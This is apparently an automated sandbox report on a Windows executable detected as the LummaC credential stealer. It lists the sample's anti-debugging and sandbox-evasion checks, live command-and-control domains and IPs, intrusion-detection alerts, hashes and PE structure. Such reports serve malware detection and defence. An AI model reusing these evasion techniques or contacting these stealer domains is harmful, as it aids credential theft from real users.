Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 85CA4B second address: 85CA69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CECAE0764h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 776DFB second address: 776E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 776E01 second address: 776E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 776FB7 second address: 776FC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CEC76E1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F8CEC76E1FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Special instruction interceptor: First address: 5C7A03 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Special instruction interceptor: First address: 5C7A92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Special instruction interceptor: First address: 76870E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Special instruction interceptor: First address: 7EE8D6 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Code function: 0_2_005C80BD rdtsc

0_2_005C80BD

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe TID: 2464

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: gEfWplq0xQ.exe, gEfWplq0xQ.exe, 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196466531.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.0000000001387000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196266727.0000000001387000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182732265.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: gEfWplq0xQ.exe, 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	File opened: SICE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Code function: 0_2_005C80BD rdtsc

0_2_005C80BD

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Code function: 0_2_005AC1F0 LdrInitializeThunk,

0_2_005AC1F0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: gEfWplq0xQ.exe	String found in binary or memory: rapeflowwj.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: crosshuaht.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: sustainskelet.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: aspecteirs.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: energyaffai.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: necklacebudi.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: discokeyus.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: grannyejh.lat
Source: gEfWplq0xQ.exe	String found in binary or memory: sweepyribs.lat

Source: gEfWplq0xQ.exe, gEfWplq0xQ.exe, 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: 3Program Manager

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	641 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gEfWplq0xQ.exe	52%	Virustotal		Browse
gEfWplq0xQ.exe	66%	ReversingLabs	Win32.Trojan.Symmi
gEfWplq0xQ.exe	100%	Avira	TR/Crypt.XPACK.Gen
gEfWplq0xQ.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
discokeyus.lat	104.21.21.99	true	false	high
grannyejh.lat	unknown	unknown	false	high
sweepyribs.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sweepyribs.lat	false	high
necklacebudi.lat	false	high
sustainskelet.lat	false	high
crosshuaht.lat	false	high
rapeflowwj.lat	false	high
https://discokeyus.lat/api	false	high
aspecteirs.lat	false	high
grannyejh.lat	false	high
discokeyus.lat	false	high
energyaffai.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.micro	gEfWplq0xQ.exe, 00000000.00000003.2182675432.000000000141A000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/Q	gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/	gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196191128.000000000135E000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/apin	gEfWplq0xQ.exe, 00000000.00000003.2182195588.0000000001420000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196502239.0000000001420000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/apip	gEfWplq0xQ.exe, 00000000.00000002.2196466531.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182732265.00000000013D9000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.21.99	discokeyus.lat	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578904
Start date and time:	2024-12-20 16:30:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gEfWplq0xQ.exe renamed because original name is a hash value
Original Sample Name:	414752ce11385194a5232f820b8480ea.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:31:18	API Interceptor	2x Sleep call for process: gEfWplq0xQ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.21.99	gNjo8FIKN5.exe	Get hash	malicious	LummaC	Browse
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse
	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse
	SBLUj2UYnk.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse
	Inv59895_abubakar.iddrisu.html	Get hash	malicious	HTMLPhisher	Browse
	V-Mail_maryland.gov.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://webuildpart.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discokeyus.lat	gNjo8FIKN5.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	f4p4BwljZt.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.197.170
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	R2CgZG545D.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.197.170
	ylV1TcJ86R.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	SBLUj2UYnk.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	172.67.197.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	gNjo8FIKN5.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	securedoc_20241220T070409.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	f4p4BwljZt.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.197.170
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://bell36588.yardione.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	R2CgZG545D.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.197.170
	https://account.book-ver.one	Get hash	malicious	Unknown	Browse	104.16.123.96
	ylV1TcJ86R.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse	104.21.21.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	gNjo8FIKN5.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	f4p4BwljZt.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.21.99
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	R2CgZG545D.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.99
	ylV1TcJ86R.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	SBLUj2UYnk.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.21.99

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948829669082413
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gEfWplq0xQ.exe
File size:	1'844'224 bytes
MD5:	414752ce11385194a5232f820b8480ea
SHA1:	139911b44c24685ee4903eb56bab51231beb9acb
SHA256:	7241e85bfd8d29f7291f7d485daa63d28749e128a14e27f686bb632dcd33ba1d
SHA512:	5bb69e8aab6fcff103467613059152488f03defb1597137fcff02834fa5b9c9e59710ac8fdb3aaa2e9128c87cbfee0a3bb6b3710e6527ecacec30767e326d950
SSDEEP:	49152:/lJcgRJr2vCrCFQkpcU/Cmqt8nc8NFIp3X:bl5JrdkG8NmpH
TLSH:	9F8533DF9F698F6DC00604B8E79879113B36B1C0B86C9E162C6DF72748C52A16A3DE4D
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@..........................@I......z....@.................................T0..h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x891000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8CECE777AAh
lar ebx, word ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F8CECE797A5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x53054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x531f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x51000	0x24800	868267763164ca7a5923b0fb30cb40df	False	0.997418129280822	data	7.9811024458091415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x1ac	0x200	75720b8ea60aa06a31806981b744f74e	False	0.5390625	data	5.245569576626531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x53000	0x1000	0x200	19a29171433eeef17e42fd663f137134	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x54000	0x2a2000	0x200	78b714049bc887d0098a6338c1258f10	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qplqdpev	0x2f6000	0x19a000	0x19a000	bc1f86ddb254c5111b18dfba847feb4d	False	0.9951797113185976	data	7.954240130509165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rbtndpvf	0x490000	0x1000	0x400	35f080818cafc0077ad0365ea1dfcc40	False	0.767578125	data	5.940900274111915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x491000	0x3000	0x2200	88ec752bf7b79901f735684521fb137f	False	0.06491268382352941	DOS executable (COM)	0.6371844004427002	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x52058	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T16:31:19.425608+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.5	59673	1.1.1.1	53	UDP
2024-12-20T16:31:19.652395+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.5	52460	1.1.1.1	53	UDP
2024-12-20T16:31:19.792615+0100	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.5	59799	1.1.1.1	53	UDP
2024-12-20T16:31:21.220924+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:21.220924+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:21.983345+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:21.983345+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:23.391854+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49705	104.21.21.99	443	TCP
2024-12-20T16:31:23.391854+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.21.99	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:31:19.995857000 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:19.995903015 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:19.996232033 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:19.998493910 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:19.998503923 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.220817089 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.220923901 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:21.223710060 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:21.223767996 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.224119902 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.264187098 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:21.310969114 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:21.311036110 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:21.311171055 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.983350039 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.983444929 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:21.983558893 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.113339901 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.113374949 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:22.113394022 CET	49704	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.113399982 CET	443	49704	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:22.202214956 CET	49705	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.202261925 CET	443	49705	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:22.202332973 CET	49705	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.202847958 CET	49705	443	192.168.2.5	104.21.21.99
Dec 20, 2024 16:31:22.202857971 CET	443	49705	104.21.21.99	192.168.2.5
Dec 20, 2024 16:31:23.391854048 CET	49705	443	192.168.2.5	104.21.21.99

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:31:19.425607920 CET	59673	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:31:19.647887945 CET	53	59673	1.1.1.1	192.168.2.5
